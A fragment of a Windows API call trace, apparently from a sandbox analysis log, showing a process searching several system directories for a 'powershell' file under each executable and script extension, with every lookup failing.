	[0815.909] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.909] SetErrorMode (uMode=0x1) returned 0x1
	[0815.910] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0815.910] SetErrorMode (uMode=0x1) returned 0x1
	[0815.910] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.910] SetErrorMode (uMode=0x1) returned 0x1
	[0815.910] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.910] SetErrorMode (uMode=0x1) returned 0x1
	[0815.911] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.911] SetErrorMode (uMode=0x1) returned 0x1
	[0815.911] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.911] SetErrorMode (uMode=0x1) returned 0x1
	[0815.911] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.912] SetErrorMode (uMode=0x1) returned 0x1
	[0815.912] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.912] SetErrorMode (uMode=0x1) returned 0x1
	[0815.912] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.912] SetErrorMode (uMode=0x1) returned 0x1
	[0815.912] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.913] SetErrorMode (uMode=0x1) returned 0x1
	[0815.913] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.913] SetErrorMode (uMode=0x1) returned 0x1
	[0815.913] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.913] SetErrorMode (uMode=0x1) returned 0x1
	[0815.913] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.914] SetErrorMode (uMode=0x1) returned 0x1
	[0815.914] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.914] SetErrorMode (uMode=0x1) returned 0x1
	[0815.914] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.914] SetErrorMode (uMode=0x1) returned 0x1
	[0815.915] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.915] SetErrorMode (uMode=0x1) returned 0x1
	[0815.915] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.915] SetErrorMode (uMode=0x1) returned 0x1
	[0815.915] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.915] SetErrorMode (uMode=0x1) returned 0x1
	[0815.916] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.916] SetErrorMode (uMode=0x1) returned 0x1
	[0815.916] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.916] SetErrorMode (uMode=0x1) returned 0x1
	[0815.916] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.916] SetErrorMode (uMode=0x1) returned 0x1
	[0815.917] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.917] SetErrorMode (uMode=0x1) returned 0x1
	[0815.917] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.917] SetErrorMode (uMode=0x1) returned 0x1
	[0815.917] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.918] SetErrorMode (uMode=0x1) returned 0x1
	[0815.918] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.918] SetErrorMode (uMode=0x1) returned 0x1
	[0815.918] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.918] SetErrorMode (uMode=0x1) returned 0x1
	[0815.919] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.919] SetErrorMode (uMode=0x1) returned 0x1
	[0815.919] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.919] SetErrorMode (uMode=0x1) returned 0x1
	[0815.919] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.920] SetErrorMode (uMode=0x1) returned 0x1
	[0815.920] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.920] SetErrorMode (uMode=0x1) returned 0x1
	[0815.920] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.920] SetErrorMode (uMode=0x1) returned 0x1
	[0815.920] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0815.921] SetErrorMode (uMode=0x1) returned 0x1
	[0815.921] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.921] SetErrorMode (uMode=0x1) returned 0x1
	[0815.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.921] SetErrorMode (uMode=0x1) returned 0x1
	[0815.921] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.922] SetErrorMode (uMode=0x1) returned 0x1
	[0815.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.922] SetErrorMode (uMode=0x1) returned 0x1
	[0815.922] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.922] SetErrorMode (uMode=0x1) returned 0x1
	[0815.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.923] SetErrorMode (uMode=0x1) returned 0x1
	[0815.923] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.923] SetErrorMode (uMode=0x1) returned 0x1
	[0815.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.923] SetErrorMode (uMode=0x1) returned 0x1
	[0815.923] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.924] SetErrorMode (uMode=0x1) returned 0x1
	[0815.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.924] SetErrorMode (uMode=0x1) returned 0x1
	[0815.924] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.924] SetErrorMode (uMode=0x1) returned 0x1
	[0815.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.925] SetErrorMode (uMode=0x1) returned 0x1
	[0815.925] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.925] SetErrorMode (uMode=0x1) returned 0x1
	[0815.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.925] SetErrorMode (uMode=0x1) returned 0x1
	[0815.926] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.926] SetErrorMode (uMode=0x1) returned 0x1
	[0815.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.926] SetErrorMode (uMode=0x1) returned 0x1
	[0815.926] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.926] SetErrorMode (uMode=0x1) returned 0x1
	[0815.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.927] SetErrorMode (uMode=0x1) returned 0x1
	[0815.927] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.927] SetErrorMode (uMode=0x1) returned 0x1
	[0815.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.928] SetErrorMode (uMode=0x1) returned 0x1
	[0815.928] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JS", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.928] SetErrorMode (uMode=0x1) returned 0x1
	[0815.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.928] SetErrorMode (uMode=0x1) returned 0x1
	[0815.928] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.JSE", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.928] SetErrorMode (uMode=0x1) returned 0x1
	[0815.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.929] SetErrorMode (uMode=0x1) returned 0x1
	[0815.929] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSF", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0815.929] SetErrorMode (uMode=0x1) returned 0x1
	[0815.929] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0815.929] SetErrorMode (uMode=0x1) returned 0x1
	[0815.929] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.WSH", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0817.396] SetErrorMode (uMode=0x1) returned 0x1
	[0817.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c78da80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0817.397] SetErrorMode (uMode=0x1) returned 0x1
	[0817.397] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.MSC", lpFindFileData=0x1c78dc20 | out: lpFindFileData=0x1c78dc20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0817.397] SetErrorMode (uMode=0x1) returned 0x1
